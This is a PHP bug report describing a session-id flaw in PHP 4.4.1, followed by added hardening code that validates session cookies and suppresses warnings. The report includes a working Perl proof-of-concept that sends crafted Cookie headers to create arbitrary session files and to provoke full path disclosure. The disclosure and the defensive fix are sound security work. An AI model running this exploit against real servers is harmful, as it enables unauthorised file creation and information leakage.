From:             sienicki dot kamil at gmail dot com
Operating system: Linux/Windows (all?)
PHP version:      4.4.1
PHP Bug Type:     Unknown/Other Function
Bug description:  problem with sessions..

Description:
------------
I wrote a simple exploit to show this vuln.. (I think..)
problem with sessions..

--
#!/usr/bin/perl
#
# PHP vulnerabilities..
#
# Exploit (Proof Of Concept ?) by Kamil 'K3' Sienicki
#
# I found two possibility of use that bug.. (maybe more)
#
# display_errors must be On
#
use strict;
use warnings;
use IO::Socket;

if (@ARGV < 3) {
    print "\n";
    print "PHP Exploit (POC)\n";
    print " by Kamil 'K3' Sienicki\n\n";
    print "1. Create fake session file (sess_fake) in directory (default /tmp).\n";
    print "2. Full path disclosure.\n\n";
    print "Usage: ./php_bug.pl [host] [address] [type of attack (1 or 2)]\n\n";
    exit;
}

my ($host, $path, $mode) = @ARGV;

# Plain HTTP on port 80; the request is written by hand so the Cookie header
# carries exactly the session id value we choose.
my $socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => "80",
) || die "[-] Connect failed! \r\n";

if ($mode == 1) {
    print "\n";
    print "PHP Exploit (POC)\n";
    print " by Kamil 'K3' Sienicki\n\n";
    print "Name of session (default PHPSESSID): ";
    my $sess = <STDIN>;
    print "Name of fake sess_file: ";
    my $fake = <STDIN>;
    chomp($sess, $fake);

    # A cookie value made only of a-z, A-Z, 0-9 passes PHP's check, so the
    # files handler creates session.save_path/sess_<value> on the server.
    print $socket "GET $path HTTP/1.0\r\n";
    print $socket "Cookie: $sess=$fake\r\n\r\n";

    # Read (and discard) the response so the request completes server-side.
    while (<$socket>) { }
    print "'$fake' fake file was created.. \n";
}
elsif ($mode == 2) {
    print "\n";
    print "PHP Exploit (POC)\n";
    print " by Kamil 'K3' Sienicki\n\n";
    print "Name of session (default PHPSESSID): ";
    my $sess = <STDIN>;
    chomp($sess);

    # The cookie value in the original post was mangled by the list archive's
    # address obfuscator ("[EMAIL PROTECTED]") and is left as found here. Any
    # value containing a character outside a-z, A-Z, 0-9 triggers the warnings.
    print $socket "GET $path HTTP/1.0\r\n";
    print $socket "Cookie: $sess=[EMAIL PROTECTED]\r\n\r\n";

    # With display_errors=On the warnings are sent as HTML ("<b>Warning</b>"),
    # so match the three-character tag prefix and print the lines that
    # disclose the script path and session.save_path.
    while (my $answer = <$socket>) {
        if ($answer =~ m/^...Warning/) {
            print $answer . "\n";
        }
    }
}

close($socket);

--

Reproduce code:
---------------
<?php

session_start();

?>


Expected result:
----------------
Warning: session_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /htdocs/sess.php on line 3

Warning: Unknown(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in Unknown on line 0

Warning: Unknown(): Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/tmp) in Unknown on line 0

Full path disclosure..


-- 
Edit bug report at http://bugs.php.net/?id=35429&edit=1
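Added hardening example for the behaviour described in this report; it is not code from the report or from PHP itself. It validates the session cookie before session_start() can hand the value to the files handler (so no sess_<attacker value> file is created), and turns display_errors off so the warning that carries session.save_path and the script path never reaches the client. It assumes session.save_handler=files and that the id arrives in a cookie; the [a-zA-Z0-9] class follows the warning text above, the length bounds are an assumption based on PHP's 32/40-character default ids, and the function names are invented for this example.

```php
<?php
// Added example, not from the bug report. Assumptions: files save handler,
// session id delivered by cookie, character class taken from the warning
// text on this page, length bounds assumed (default ids are 32 or 40 chars).

// The full-path disclosure lives only in the warning text, so keep warnings
// out of the response body and send them to the error log instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Never accept an id from the query string or POST body (PHP >= 4.3.0).
ini_set('session.use_only_cookies', '1');

function session_id_is_well_formed($id)
{
    // Only the characters PHP itself accepts, plus a sane length, so values
    // such as "../x", "@#$" or a 10 KB string never reach the files handler.
    return is_string($id) && preg_match('/^[a-zA-Z0-9]{22,256}$/', $id) === 1;
}

function start_session_safely()
{
    $name   = session_name();                       // PHPSESSID unless configured
    $cookie = isset($_COOKIE[$name]) ? $_COOKIE[$name] : null;

    if ($cookie !== null && !session_id_is_well_formed($cookie)) {
        // session_start() takes the id from $_COOKIE; removing the entry
        // makes PHP generate a fresh id and send its own Set-Cookie, so the
        // attacker-chosen value is never used as a filename suffix.
        unset($_COOKIE[$name]);
        error_log("rejected malformed session id from " . $_SERVER['REMOTE_ADDR']);
    }

    return session_start();
}

start_session_safely();
$_SESSION['hits'] = isset($_SESSION['hits']) ? $_SESSION['hits'] + 1 : 1;
echo "hits: " . $_SESSION['hits'];
```

On PHP 5.5.2 and later, session.use_strict_mode=1 additionally makes PHP refuse an id it did not issue itself, which closes the "fake session file" case without application code; it does not exist in the 4.4.x line this report targets. Newer PHP versions also accept ',' and '-' in ids, so the character class should be widened there to match the server's own rule.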